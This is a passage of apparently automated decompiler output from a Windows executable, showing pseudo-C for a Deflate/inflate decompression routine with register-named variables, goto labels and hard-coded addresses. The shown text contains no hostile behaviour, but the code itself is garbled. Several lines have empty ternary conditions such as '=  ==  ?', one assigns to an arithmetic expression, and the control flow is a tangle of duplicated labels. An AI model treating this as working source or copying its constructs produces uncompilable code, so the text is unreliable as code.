                                                                            										 *(_t657 + 0x2c) = 9;
                                                                            										 *(_t657 + 0x28) = (_t595 >> 0x00000005 & 0x0000001f) + 1;
                                                                            										 *(_t657 + 0x28) = 6;
                                                                            										_t513 = E00406EA8( &(_t567[3]), (_t595 & 0x0000001f) + 0x101, 0x101, 0x4099c4, 0x409a04, _t657 + 0x48, _t657 + 0x30,  &(_t567[0x148]), _t657 + 0x2c);
                                                                            										_t602 = 0xffffffff;
                                                                            										_t476 =  ==  ? _t602 : _t513;
                                                                            										if(_t476 != 0) {
                                                                            											L187:
                                                                            											_t637 =  *(_t657 + 0x48);
                                                                            											L188:
                                                                            											_t567[0x146] = _t652;
                                                                            											_t567[0x147] = _t647;
                                                                            											 *_t567 = 0x11;
                                                                            											_t637[1] =  *(_t657 + 0x10);
                                                                            											L195:
                                                                            											 *(_t657 + 0x1c) = _t476 | 0xffffffff;
                                                                            											goto L196;
                                                                            										}
                                                                            										L96:
                                                                            										_t476 = E00406EA8( &(_t567[ *((intOrPtr*)(_t657 + 0x50)) + 3]),  *((intOrPtr*)(_t657 + 0x34)), 0, 0x409a44, 0x409a80, _t657 + 0x4c, _t657 + 0x28,  &(_t567[0x148]), _t657 + 0x2c);
                                                                            										if(_t476 != 0) {
                                                                            											goto L187;
                                                                            										}
                                                                            										L97:
                                                                            										_t476 =  *(_t657 + 0x20);
                                                                            										if(_t476 != 0 ||  *(_t657 + 0x30) <= 0x101) {
                                                                            											L99:
                                                                            											 *_t567 =  *_t567 & 0x00000000;
                                                                            											_t567[4] = _t476;
                                                                            											_t567[5] =  *(_t657 + 0x3c);
                                                                            											_t567[4] =  *(_t657 + 0x28);
                                                                            											_t567[6] =  *(_t657 + 0x40);
                                                                            											L100:
                                                                            											_t567[3] = _t567[4] & 0x000000ff;
                                                                            											_t567[2] = _t567[5];
                                                                            											_t526 =  *(_t657 + 0x10);
                                                                            											 *_t567 = 1;
                                                                            											L101:
                                                                            											_t637 =  *(_t657 + 0x48);
                                                                            											while(1) {
                                                                            												L104:
                                                                            												_t604 = _t567[3];
                                                                            												if(_t652 >= _t604) {
                                                                            													break;
                                                                            												}
                                                                            												L102:
                                                                            												if(_t526 == 0) {
                                                                            													goto L189;
                                                                            												}
                                                                            												L103:
                                                                            												 *(_t657 + 0x10) = _t526 - 1;
                                                                            												_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
                                                                            												 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
                                                                            												_t526 =  *(_t657 + 0x10);
                                                                            												_t652 = _t652 + 8;
                                                                            											}
                                                                            											L105:
                                                                            											_t531 = _t567[2];
                                                                            											_t607 =  *(0x40b0c0 + _t604 * 2) & 0x0000ffff & _t647;
                                                                            											_t644 = _t531 + _t607 * 4;
                                                                            											_t608 =  *(_t531 + 1 + _t607 * 4) & 0x000000ff;
                                                                            											_t652 = _t652 - _t608;
                                                                            											_t647 = _t647 >> _t608;
                                                                            											_t609 = _t644;
                                                                            											 *(_t657 + 0x30) = _t644;
                                                                            											 *(_t657 + 0x20) = _t652;
                                                                            											_t532 =  *_t609 & 0x000000ff;
                                                                            											if(_t532 != 0) {
                                                                            												L107:
                                                                            												if((_t532 & 0x00000010) == 0) {
                                                                            													L109:
                                                                            													if((_t532 & 0x00000040) != 0) {
                                                                            														L111:
                                                                            														if((_t532 & 0x00000020) == 0) {
                                                                            															L193:
                                                                            															_t476 =  *(_t657 + 0x10);
                                                                            															L194:
                                                                            															_t637 =  *(_t657 + 0x48);
                                                                            															 *_t567 = 0x11;
                                                                            															_t567[0x147] = _t647;
                                                                            															_t567[0x146] = _t652;
                                                                            															_t637[1] = _t476;
                                                                            															goto L195;
                                                                            														}
                                                                            														L112:
                                                                            														_t533 = 7;
                                                                            														 *_t567 = _t533;
                                                                            														L22:
                                                                            														L177:
                                                                            														_t476 =  *(_t657 + 0x10);
                                                                            														L178:
                                                                            														_t639 = 0xf;
                                                                            														L179:
                                                                            														while( *_t567 <= _t639) {
                                                                            															switch( *((intOrPtr*)( *_t567 * 4 +  &M00407F7E))) {
                                                                            																case 0:
                                                                            																	goto L100;
                                                                            																case 1:
                                                                            																	goto L101;
                                                                            																case 2:
                                                                            																	L113:
                                                                            																	__edx =  *(__esp + 0x48);
                                                                            																	while(1) {
                                                                            																		L116:
                                                                            																		__ecx = __ebx[2];
                                                                            																		__eflags = __esi - __ecx;
                                                                            																		if(__esi >= __ecx) {
                                                                            																			break;
                                                                            																		}
                                                                            																		L114:
                                                                            																		__eflags = __eax;
                                                                            																		if(__eax == 0) {
                                                                            																			goto L189;
                                                                            																		}
                                                                            																		L115:
                                                                            																		__eax = __eax - 1;
                                                                            																		__ecx = __esi;
                                                                            																		 *(__esp + 0x10) = __eax;
                                                                            																		 *(__esp + 0x14) =  *( *(__esp + 0x14)) & 0x000000ff;
                                                                            																		__eax = ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
                                                                            																		__edi = __edi | ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
                                                                            																		 *(__esp + 0x14) =  *(__esp + 0x14) + 1;
                                                                            																		__eax =  *(__esp + 0x10);
                                                                            																		__esi = __esi + 8;
                                                                            																		__eflags = __esi;
                                                                            																	}
                                                                            																	L117:
                                                                            																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff;
                                                                            																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff & __edi;
                                                                            																	__edi = __edi >> __cl;
                                                                            																	__ebx[1] = __ebx[1] + __eax;
                                                                            																	__esi = __esi - __ecx;
                                                                            																	__eflags = __esi;
                                                                            																	__eax = __ebx[4] & 0x000000ff;
                                                                            																	__ebx[3] = __ebx[4] & 0x000000ff;
                                                                            																	__eax = __ebx[6];
                                                                            																	__ebx[2] = __ebx[6];
                                                                            																	_push(3);
                                                                            																	_pop(__eax);
                                                                            																	 *__ebx = __ebx[6];
                                                                            																	__eax =  *(__esp + 0x10);
                                                                            																	goto L118;
                                                                            																case 3:
                                                                            																	L118:
                                                                            																	__edx =  *(__esp + 0x48);
                                                                            																	while(1) {
                                                                            																		L121:
                                                                            																		__ecx = __ebx[3];
                                                                            																		__eflags = __esi - __ecx;
                                                                            																		if(__esi >= __ecx) {
                                                                            																			break;
                                                                            																		}
                                                                            																		L119:
                                                                            																		__eflags = __eax;
                                                                            																		if(__eax == 0) {
                                                                            																			goto L189;
                                                                            																		}
                                                                            																		L120:
                                                                            																		__eax = __eax - 1;
                                                                            																		__ecx = __esi;
                                                                            																		 *(__esp + 0x10) = __eax;
                                                                            																		 *(__esp + 0x14) =  *( *(__esp + 0x14)) & 0x000000ff;
                                                                            																		__eax = ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
                                                                            																		__edi = __edi | ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
                                                                            																		 *(__esp + 0x14) =  *(__esp + 0x14) + 1;
                                                                            																		__eax =  *(__esp + 0x10);
                                                                            																		__esi = __esi + 8;
                                                                            																		__eflags = __esi;
                                                                            																	}
                                                                            																	L122:
                                                                            																	__ecx =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff;
                                                                            																	__eax = __ebx[2];
                                                                            																	__eax = __ebx[2] + __ecx * 4;
                                                                            																	__ecx =  *(__eax + 1) & 0x000000ff;
                                                                            																	 *(__esp + 0x30) = __eax;
                                                                            																	__esi = __esi - ( *(__eax + 1) & 0x000000ff);
                                                                            																	__eax =  *__eax & 0x000000ff;
                                                                            																	__edi = __edi >> __cl;
                                                                            																	 *(__esp + 0x20) = __esi;
                                                                            																	__eflags = __al & 0x00000010;
                                                                            																	if((__al & 0x00000010) == 0) {
                                                                            																		L124:
                                                                            																		__eflags = __al & 0x00000040;
                                                                            																		if((__al & 0x00000040) != 0) {
                                                                            																			goto L193;
                                                                            																		}
                                                                            																		L125:
                                                                            																		__ecx =  *(__esp + 0x30);
                                                                            																		goto L110;
                                                                            																	}
                                                                            																	L123:
                                                                            																	_push(0xf);
                                                                            																	_pop(__ecx);
                                                                            																	__eax = __eax & __ecx;
                                                                            																	__ecx =  *(__esp + 0x30);
                                                                            																	__ebx[2] = __eax;
                                                                            																	__eax =  *(__ecx + 2) & 0x0000ffff;
                                                                            																	__ebx[3] = __eax;
                                                                            																	 *__ebx = 4;
                                                                            																	goto L22;
                                                                            																case 4:
                                                                            																	L126:
                                                                            																	__edx =  *(__esp + 0x48);
                                                                            																	while(1) {
                                                                            																		L129:
                                                                            																		__ecx = __ebx[2];
                                                                            																		__eflags = __esi - __ecx;
                                                                            																		if(__esi >= __ecx) {
                                                                            																			break;
                                                                            																		}
                                                                            																		L127:
                                                                            																		__eflags = __eax;
                                                                            																		if(__eax == 0) {
                                                                            																			goto L189;
                                                                            																		}
                                                                            																		L128:
                                                                            																		__eax = __eax - 1;
                                                                            																		__ecx = __esi;
                                                                            																		 *(__esp + 0x10) = __eax;
                                                                            																		 *(__esp + 0x14) =  *( *(__esp + 0x14)) & 0x000000ff;
                                                                            																		__eax = ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
                                                                            																		__edi = __edi | ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
                                                                            																		 *(__esp + 0x14) =  *(__esp + 0x14) + 1;
                                                                            																		__eax =  *(__esp + 0x10);
                                                                            																		__esi = __esi + 8;
                                                                            																		__eflags = __esi;
                                                                            																	}
                                                                            																	L130:
                                                                            																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff;
                                                                            																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff & __edi;
                                                                            																	__edi = __edi >> __cl;
                                                                            																	__ebx[3] = __ebx[3] + __eax;
                                                                            																	__esi = __esi - __ecx;
                                                                            																	__eflags = __esi;
                                                                            																	__ecx =  *(__esp + 0x18);
                                                                            																	 *(__esp + 0x20) = __esi;
                                                                            																	 *__ebx = 5;
                                                                            																	goto L131;
                                                                            																case 5:
                                                                            																	L131:
                                                                            																	__edx =  *(__esp + 0x48);
                                                                            																	__ecx = __ecx - __ebx;
                                                                            																	__eax = __ecx - __ebx - 0x1ba0;
                                                                            																	__eflags = __ecx - __ebx - 0x1ba0 - __ebx[3];
                                                                            																	if(__ecx - __ebx - 0x1ba0 >= __ebx[3]) {
                                                                            																		__eax = __ecx;
                                                                            																		__eax = __ecx - __ebx[3];
                                                                            																		__eflags = __eax;
                                                                            																	} else {
                                                                            																		__ebx[0x26e8] = __ebx[0x26e8] - __ebx[3];
                                                                            																		__ebx[0x26e8] - __ebx[3] - __ebx = __ebx[0x26e8] - __ebx[3] - __ebx + 0xffffe460;
                                                                            																		__eax = __ebx[0x26e8] - __ebx[3] - __ebx + 0xffffe460 + __ecx;
                                                                            																	}
                                                                            																	__eflags = __ebx[1];
                                                                            																	 *(__esp + 0x24) = __eax;
                                                                            																	if(__ebx[1] != 0) {
                                                                            																		do {
                                                                            																			L135:
                                                                            																			__eflags = __ebp;
                                                                            																			if(__ebp != 0) {
                                                                            																				goto L151;
                                                                            																			}
                                                                            																			L136:
                                                                            																			__eflags = __ecx - __ebx[0x26e8];
                                                                            																			if(__ecx != __ebx[0x26e8]) {
                                                                            																				L142:
                                                                            																				__ebx[0x26ea] = __ecx;
                                                                            																				L00407FBE(__edx);
                                                                            																				__ecx = __ebx[0x26ea];
                                                                            																				__eax = __ebx[0x26e9];
                                                                            																				__edx =  *(__esp + 0x48);
                                                                            																				 *(__esp + 0x18) = __ecx;
                                                                            																				__eflags = __ecx - __eax;
                                                                            																				if(__ecx >= __eax) {
                                                                            																					__eax = __ebx[0x26e8];
                                                                            																					__ebp = __eax;
                                                                            																					__ebp = __eax - __ecx;
                                                                            																					__eflags = __ebp;
                                                                            																				} else {
                                                                            																					__ebp = __eax;
                                                                            																					__eax =  *(__edx + 0x9bb0);
                                                                            																					__ebp = __ebp - __ecx;
                                                                            																					__ebp = __ebp - 1;
                                                                            																				}
                                                                            																				 *(__esp + 0x30) = __eax;
                                                                            																				__eflags = __ecx - __eax;
                                                                            																				if(__ecx == __eax) {
                                                                            																					__eax =  &(__ebx[0x6e8]);
                                                                            																					__eflags = __ebx[0x26e9] - __eax;
                                                                            																					if(__ebx[0x26e9] != __eax) {
                                                                            																						__ebp = __ebx[0x26e9];
                                                                            																						__ecx = __eax;
                                                                            																						 *(__esp + 0x18) = __ecx;
                                                                            																						__eflags = __eax - __ebp;
                                                                            																						if(__eax >= __ebp) {
                                                                            																							__ebp =  *(__esp + 0x30);
                                                                            																							__ebp =  *(__esp + 0x30) - __eax;
                                                                            																							__eflags = __ebp;
                                                                            																						} else {
                                                                            																							__ebp = __ebp - __eax;
                                                                            																							__ebp = __ebp - 1;
                                                                            																						}
                                                                            																					}
                                                                            																				}
                                                                            																				__eflags = __ebp;
                                                                            																				if(__ebp == 0) {
                                                                            																					goto L192;
                                                                            																				} else {
                                                                            																					goto L151;
                                                                            																				}
                                                                            																			}
                                                                            																			L137:
                                                                            																			__ebp = __ebx[0x26e9];
                                                                            																			__eax =  &(__ebx[0x6e8]);
                                                                            																			__eflags = __ebp - __eax;
                                                                            																			if(__eflags == 0) {
                                                                            																				goto L142;
                                                                            																			}
                                                                            																			L138:
                                                                            																			__ecx = __eax;
                                                                            																			if(__eflags <= 0) {
                                                                            																				__ebp = __ebx[0x26e8];
                                                                            																				__ebp = __ebx[0x26e8] - __eax;
                                                                            																				__eflags = __ebp;
                                                                            																			} else {
                                                                            																				__ebp = __ebp - __eax;
                                                                            																				__ebp = __ebp - 1;
                                                                            																			}
                                                                            																			__eflags = __ebp;
                                                                            																			if(__ebp == 0) {
                                                                            																				goto L142;
                                                                            																			}
                                                                            																			L151:
                                                                            																			__eax =  *(__esp + 0x24);
                                                                            																			__al =  *( *(__esp + 0x24));
                                                                            																			 *__ecx = __al;
                                                                            																			__ecx = __ecx + 1;
                                                                            																			__eax =  *(__esp + 0x24);
                                                                            																			__eax =  *(__esp + 0x24) + 1;
                                                                            																			 *(__esp + 0x18) = __ecx;
                                                                            																			__ebp = __ebp - 1;
                                                                            																			 *(__esp + 0x24) = __eax;
                                                                            																			__eflags = __eax - __ebx[0x26e8];
                                                                            																			if(__eax == __ebx[0x26e8]) {
                                                                            																				__eax =  &(__ebx[0x6e8]);
                                                                            																				 *(__esp + 0x24) = __eax;
                                                                            																			}
                                                                            																			_t356 =  &(__ebx[1]);
                                                                            																			 *_t356 = __ebx[1] - 1;
                                                                            																			__eflags =  *_t356;
                                                                            																		} while ( *_t356 != 0);
                                                                            																	}
                                                                            																	goto L154;
                                                                            																case 6:
                                                                            																	L155:
                                                                            																	__edx =  *(__esp + 0x48);
                                                                            																	__eflags = __ebp;
                                                                            																	if(__ebp != 0) {
                                                                            																		L171:
                                                                            																		__al = __ebx[2];
                                                                            																		 *__ecx = __al;
                                                                            																		__ecx = __ecx + 1;
                                                                            																		 *(__esp + 0x18) = __ecx;
                                                                            																		__ebp = __ebp - 1;
                                                                            																		L154:
                                                                            																		 *__ebx =  *__ebx & 0x00000000;
                                                                            																		goto L177;
                                                                            																	}
                                                                            																	L156:
                                                                            																	__eflags = __ecx - __ebx[0x26e8];
                                                                            																	if(__ecx != __ebx[0x26e8]) {
                                                                            																		L162:
                                                                            																		__ebx[0x26ea] = __ecx;
                                                                            																		L00407FBE(__edx);
                                                                            																		__ecx = __ebx[0x26ea];
                                                                            																		__eax = __ebx[0x26e9];
                                                                            																		__edx =  *(__esp + 0x48);
                                                                            																		 *(__esp + 0x18) = __ecx;
                                                                            																		__eflags = __ecx - __eax;
                                                                            																		if(__ecx >= __eax) {
                                                                            																			__eax = __ebx[0x26e8];
                                                                            																			__ebp = __eax;
                                                                            																			__ebp = __eax - __ecx;
                                                                            																			__eflags = __ebp;
                                                                            																		} else {
                                                                            																			__ebp = __eax;
                                                                            																			__eax =  *(__edx + 0x9bb0);
                                                                            																			__ebp = __ebp - __ecx;
                                                                            																			__ebp = __ebp - 1;
                                                                            																		}
                                                                            																		 *(__esp + 0x30) = __eax;
                                                                            																		__eflags = __ecx - __eax;
                                                                            																		if(__ecx == __eax) {
                                                                            																			__eax =  &(__ebx[0x6e8]);
                                                                            																			__eflags = __ebx[0x26e9] - __eax;
                                                                            																			if(__ebx[0x26e9] != __eax) {
                                                                            																				__ebp = __ebx[0x26e9];
                                                                            																				__ecx = __eax;
                                                                            																				 *(__esp + 0x18) = __ecx;
                                                                            																				__eflags = __eax - __ebp;
                                                                            																				if(__eax >= __ebp) {
                                                                            																					__ebp =  *(__esp + 0x30);
                                                                            																					__ebp =  *(__esp + 0x30) - __eax;
                                                                            																					__eflags = __ebp;
                                                                            																				} else {
                                                                            																					__ebp = __ebp - __eax;
                                                                            																					__ebp = __ebp - 1;
                                                                            																				}
                                                                            																			}
                                                                            																		}
                                                                            																		__eflags = __ebp;
                                                                            																		if(__ebp == 0) {
                                                                            																			goto L192;
                                                                            																		} else {
                                                                            																			goto L171;
                                                                            																		}
                                                                            																	}
                                                                            																	L157:
                                                                            																	__ebp = __ebx[0x26e9];
                                                                            																	__eax =  &(__ebx[0x6e8]);
                                                                            																	__eflags = __ebp - __eax;
                                                                            																	if(__eflags == 0) {
                                                                            																		goto L162;
                                                                            																	}
                                                                            																	L158:
                                                                            																	__ecx = __eax;
                                                                            																	if(__eflags <= 0) {
                                                                            																		__ebp = __ebx[0x26e8];
                                                                            																		__ebp = __ebx[0x26e8] - __eax;
                                                                            																		__eflags = __ebp;
                                                                            																	} else {
                                                                            																		__ebp = __ebp - __eax;
                                                                            																		__ebp = __ebp - 1;
                                                                            																	}
                                                                            																	__eflags = __ebp;
                                                                            																	if(__ebp != 0) {
                                                                            																		goto L171;
                                                                            																	} else {
                                                                            																		goto L162;
                                                                            																	}
                                                                            																case 7:
                                                                            																	L172:
                                                                            																	_push(7);
                                                                            																	_pop(__ebp);
                                                                            																	__eflags = __esi - __ebp;
                                                                            																	if(__esi > __ebp) {
                                                                            																		__esi = __esi - 8;
                                                                            																		__eax = __eax + 1;
                                                                            																		_t378 = __esp + 0x14;
                                                                            																		 *_t378 =  *(__esp + 0x14) - 1;
                                                                            																		__eflags =  *_t378;
                                                                            																		 *(__esp + 0x20) = __esi;
                                                                            																		 *(__esp + 0x10) = __eax;
                                                                            																	}
                                                                            																	goto L174;
                                                                            																case 8:
                                                                            																	L2:
                                                                            																	_t641 =  *(_t657 + 0x48);
                                                                            																	__eflags = _t652 - 3;
                                                                            																	if(_t652 >= 3) {
                                                                            																		L7:
                                                                            																		_t652 = _t652 + 0xfffffffd;
                                                                            																		_t478 = _t647 & 0x00000007;
                                                                            																		_t647 = _t647 >> 3;
                                                                            																		 *(_t657 + 0x30) = _t478;
                                                                            																		__eflags = _t478 & 0x00000001;
                                                                            																		_push(8);
                                                                            																		_pop(_t479);
                                                                            																		_t480 =  !=  ?  *((void*)(_t657 + 0x34)) : _t479;
                                                                            																		_t567[0x145] =  !=  ?  *((void*)(_t657 + 0x34)) : _t479;
                                                                            																		 *(_t657 + 0x2c) = _t647;
                                                                            																		 *(_t657 + 0x20) = _t652;
                                                                            																		_t483 =  *(_t657 + 0x30) >> 1;
                                                                            																		__eflags = _t483;
                                                                            																		if(_t483 == 0) {
                                                                            																			L23:
                                                                            																			_push(7);
                                                                            																			 *_t567 = 9;
                                                                            																			_pop(_t484);
                                                                            																			_t647 = _t647 >> (_t652 & _t484);
                                                                            																			_t652 = _t652 & 0xfffffff8;
                                                                            																			 *(_t657 + 0x20) = _t652;
                                                                            																			goto L22;
                                                                            																		}
                                                                            																		L8:
                                                                            																		_t485 = _t483 - 1;
                                                                            																		__eflags = _t485;
                                                                            																		if(_t485 == 0) {
                                                                            																			L13:
                                                                            																			__eflags =  *0x432810;
                                                                            																			if( *0x432810 != 0) {
                                                                            																				L21:
                                                                            																				_t486 =  *0x40b0e4; // 0x9
                                                                            																				_t567[4] = _t486;
                                                                            																				_t487 =  *0x40b0e8; // 0x5
                                                                            																				_t567[4] = _t487;
                                                                            																				_t488 =  *0x433098; // 0x0
                                                                            																				_t567[5] = _t488;
                                                                            																				_t489 =  *0x43309c; // 0x0
                                                                            																				 *_t567 =  *_t567 & 0x00000000;
                                                                            																				__eflags =  *_t567;
                                                                            																				_t567[6] = _t489;
                                                                            																				goto L22;
                                                                            																			} else {
                                                                            																				 *(_t657 + 0x28) =  *(_t657 + 0x28) & 0x00000000;
                                                                            																				_t490 = 0;
                                                                            																				__eflags = 0;
                                                                            																				_push(7);
                                                                            																				_pop(_t569);
                                                                            																				do {
                                                                            																					L15:
                                                                            																					_push(8);
                                                                            																					_pop(_t583);
                                                                            																					__eflags = _t490 - 0x8f;
                                                                            																					if(_t490 > 0x8f) {
                                                                            																						__eflags = _t490 - 0x100;
                                                                            																						if(_t490 >= 0x100) {
                                                                            																							_push(8);
                                                                            																							__eflags = _t490 - 0x118;
                                                                            																							_pop(_t587);
                                                                            																							_t583 =  <  ? _t569 : _t587;
                                                                            																							__eflags = _t583;
                                                                            																						} else {
                                                                            																							_push(9);
                                                                            																							_pop(_t583);
                                                                            																						}
                                                                            																					}
                                                                            																					L19:
                                                                            																					 *(0x433520 + _t490 * 4) = _t583;
                                                                            																					_t490 = _t490 + 1;
                                                                            																					__eflags = _t490 - 0x120;
                                                                            																				} while (_t490 < 0x120);
                                                                            																				_t567 =  *(_t657 + 0x38);
                                                                            																				E00406EA8(0x433520, 0x120, 0x101, 0x4099c4, 0x409a04, 0x433098, 0x40b0e4, 0x432818, _t657 + 0x28);
                                                                            																				_push(0x1e);
                                                                            																				_pop(_t585);
                                                                            																				_push(5);
                                                                            																				_pop(_t493);
                                                                            																				memset(0x433520, _t493, _t585 << 2);
                                                                            																				_t657 = _t657 + 0xc;
                                                                            																				E00406EA8(0x433520, 0x1e, 0, 0x409a44, 0x409a80, 0x43309c, 0x40b0e8, 0x432818, _t657 + 0x28);
                                                                            																				_t647 =  *(_t657 + 0x2c);
                                                                            																				 *0x432810 = 1;
                                                                            																				goto L21;
                                                                            																			}
                                                                            																		}
                                                                            																		L9:
                                                                            																		_t497 = _t485 - 1;
                                                                            																		__eflags = _t497;
                                                                            																		if(_t497 == 0) {
                                                                            																			 *_t567 = 0xb;
                                                                            																			goto L177;
                                                                            																		}
                                                                            																		L10:
                                                                            																		__eflags = _t497 == 1;
                                                                            																		_t476 =  *(_t657 + 0x10);
                                                                            																		if(_t497 == 1) {
                                                                            																			goto L194;
                                                                            																		} else {
                                                                            																			goto L178;
                                                                            																		}
                                                                            																	} else {
                                                                            																		_t588 =  *(_t657 + 0x14);
                                                                            																		while(1) {
                                                                            																			L4:
                                                                            																			__eflags = _t476;
                                                                            																			if(_t476 == 0) {
                                                                            																				goto L181;
                                                                            																			}
                                                                            																			L5:
                                                                            																			 *(_t657 + 0x10) = _t476 - 1;
                                                                            																			_t503 = ( *_t588 & 0x000000ff) << _t652;
                                                                            																			_t652 = _t652 + 8;
                                                                            																			_t647 = _t647 | _t503;
                                                                            																			_push(3);
                                                                            																			_pop(_t504);
                                                                            																			_t588 =  &(( *(_t657 + 0x14))[1]);
                                                                            																			__eflags = _t652 - _t504;
                                                                            																			_t476 =  *(_t657 + 0x10);
                                                                            																			 *(_t657 + 0x14) = _t588;
                                                                            																			if(_t652 < _t504) {
                                                                            																				continue;
                                                                            																			} else {
                                                                            																				goto L7;
                                                                            																			}
                                                                            																		}
                                                                            																		goto L181;
                                                                            																	}
                                                                            																case 9:
                                                                            																	L24:
                                                                            																	__edx =  *(__esp + 0x48);
                                                                            																	__eflags = __esi - 0x20;
                                                                            																	if(__esi >= 0x20) {
                                                                            																		L29:
                                                                            																		__eax = __di & 0x0000ffff;
                                                                            																		__esi = 0;
                                                                            																		__edi = 0;
                                                                            																		__ebx[1] = __eax;
                                                                            																		 *(__esp + 0x20) = 0;
                                                                            																		__eflags = __eax;
                                                                            																		if(__eax == 0) {
                                                                            																			__eax = __ebx[0x145];
                                                                            																		} else {
                                                                            																			_push(0xa);
                                                                            																			_pop(__eax);
                                                                            																		}
                                                                            																		 *__ebx = __eax;
                                                                            																		goto L177;
                                                                            																	}
                                                                            																	L25:
                                                                            																	__ecx =  *(__esp + 0x14);
                                                                            																	while(1) {
                                                                            																		L26:
                                                                            																		__eflags = __eax;
                                                                            																		if(__eax == 0) {
                                                                            																			break;
                                                                            																		}
                                                                            																		L27:
                                                                            																		 *(__esp + 0x10) = __eax;
                                                                            																		__eax =  *__ecx & 0x000000ff;
                                                                            																		__ecx = __esi;
                                                                            																		__eax = __eax << __cl;
                                                                            																		__esi = __esi + 8;
                                                                            																		__ecx =  *(__esp + 0x14);
                                                                            																		__edi = __edi | __eax;
                                                                            																		__eax =  *(__esp + 0x10);
                                                                            																		__ecx =  *(__esp + 0x14) + 1;
                                                                            																		 *(__esp + 0x14) = __ecx;
                                                                            																		__eflags = __esi - 0x20;
                                                                            																		if(__esi < 0x20) {
                                                                            																			continue;
                                                                            																		}
                                                                            																		L28:
                                                                            																		__ecx =  *(__esp + 0x18);
                                                                            																		goto L29;
                                                                            																	}
                                                                            																	L181:
                                                                            																	_t567[0x147] = _t647;
                                                                            																	_t567[0x146] = _t652;
                                                                            																	_t393 =  &(_t641[1]);
                                                                            																	 *_t393 = _t641[1] & 0x00000000;
                                                                            																	__eflags =  *_t393;
                                                                            																	 *_t641 = _t588;
                                                                            																	_t567[0x26ea] =  *(_t657 + 0x18);
                                                                            																	goto L182;
                                                                            																case 0xa:
                                                                            																	L33:
                                                                            																	__edx =  *(__esp + 0x48);
                                                                            																	__eflags = __eax;
                                                                            																	if(__eax == 0) {
                                                                            																		L185:
                                                                            																		__eax =  *(__esp + 0x14);
                                                                            																		__ebx[0x147] = __edi;
                                                                            																		__ebx[0x146] = __esi;
                                                                            																		 *(__edx + 4) =  *(__edx + 4) & 0x00000000;
                                                                            																		 *__edx =  *(__esp + 0x14);
                                                                            																		__ebx[0x26ea] = __ecx;
                                                                            																		L182:
                                                                            																		_push(_t641);
                                                                            																		L183:
                                                                            																		L00407FBE();
                                                                            																		_t450 = 0;
                                                                            																		goto L197;
                                                                            																	}
                                                                            																	L34:
                                                                            																	__eflags = __ebp;
                                                                            																	if(__ebp != 0) {
                                                                            																		L51:
                                                                            																		__edx =  *(__esp + 0x14);
                                                                            																		__eflags = __ebp - __eax;
                                                                            																		__esi = __eax;
                                                                            																		__esi =  <  ? __ebp : __eax;
                                                                            																		__eflags = __ebx[1] - __esi;
                                                                            																		__esi =  <  ? __ebx[1] : __esi;
                                                                            																		E004066B4(__ecx,  *(__esp + 0x14), __esi) =  *(__esp + 0x10);
                                                                            																		__ebp = __ebp - __esi;
                                                                            																		__ecx =  *(__esp + 0x18);
                                                                            																		__eax =  *(__esp + 0x10) - __esi;
                                                                            																		 *(__esp + 0x14) =  *(__esp + 0x14) + __esi;
                                                                            																		__ecx =  *(__esp + 0x18) + __esi;
                                                                            																		_t72 =  &(__ebx[1]);
                                                                            																		 *_t72 = __ebx[1] - __esi;
                                                                            																		__eflags =  *_t72;
                                                                            																		__esi =  *(__esp + 0x20);
                                                                            																		_push(0xf);
                                                                            																		 *(__esp + 0x14) = __eax;
                                                                            																		 *(__esp + 0x1c) = __ecx;
                                                                            																		_pop(__edx);
                                                                            																		if( *_t72 != 0) {
                                                                            																			goto L179;
                                                                            																		}
                                                                            																		L52:
                                                                            																		__eax = __ebx[0x145];
                                                                            																		 *__ebx = __eax;
                                                                            																		L53:
                                                                            																		_t476 =  *(_t657 + 0x10);
                                                                            																		goto L179;
                                                                            																	}
                                                                            																	L35:
                                                                            																	__eflags = __ecx - __ebx[0x26e8];
                                                                            																	if(__ecx != __ebx[0x26e8]) {
                                                                            																		L41:
                                                                            																		__ebx[0x26ea] = __ecx;
                                                                            																		L00407FBE(__edx);
                                                                            																		__ecx = __ebx[0x26ea];
                                                                            																		__edx = __ebx[0x26e9];
                                                                            																		__eax = __ebx[0x26e8];
                                                                            																		 *(__esp + 0x18) = __ecx;
                                                                            																		__eflags = __ecx - __edx;
                                                                            																		if(__ecx >= __edx) {
                                                                            																			__ebp = __eax;
                                                                            																			__ebp = __eax - __ecx;
                                                                            																			__eflags = __ebp;
                                                                            																		} else {
                                                                            																			__edx = __edx - __ecx;
                                                                            																			__ebp = __edx - __ecx - 1;
                                                                            																		}
                                                                            																		__eflags = __ecx - __eax;
                                                                            																		if(__ecx == __eax) {
                                                                            																			__eax =  &(__ebx[0x6e8]);
                                                                            																			__eflags = __edx - __eax;
                                                                            																			if(__eflags != 0) {
                                                                            																				__ecx = __eax;
                                                                            																				 *(__esp + 0x18) = __ecx;
                                                                            																				if(__eflags <= 0) {
                                                                            																					__ebp = __ebx[0x26e8];
                                                                            																					__ebp = __ebx[0x26e8] - __eax;
                                                                            																					__eflags = __ebp;
                                                                            																				} else {
                                                                            																					__ebp = __edx - __eax - 1;
                                                                            																				}
                                                                            																			}
                                                                            																		}
                                                                            																		__eflags = __ebp;
                                                                            																		if(__ebp == 0) {
                                                                            																			L184:
                                                                            																			__eax =  *(__esp + 0x48);
                                                                            																			__edx =  *(__esp + 0x14);
                                                                            																			__ebx[0x146] = __esi;
                                                                            																			__esi =  *(__esp + 0x10);
                                                                            																			__ebx[0x147] = __edi;
                                                                            																			 *(__eax + 4) =  *(__esp + 0x10);
                                                                            																			 *__eax =  *(__esp + 0x14);
                                                                            																			__ebx[0x26ea] = __ecx;
                                                                            																			_push(__eax);
                                                                            																			goto L183;
                                                                            																		} else {
                                                                            																			L50:
                                                                            																			__eax =  *(__esp + 0x10);
                                                                            																			goto L51;
                                                                            																		}
                                                                            																	}
                                                                            																	L36:
                                                                            																	__ebp =  &(__ebx[0x6e8]);
                                                                            																	 *(__esp + 0x24) =  &(__ebx[0x6e8]);
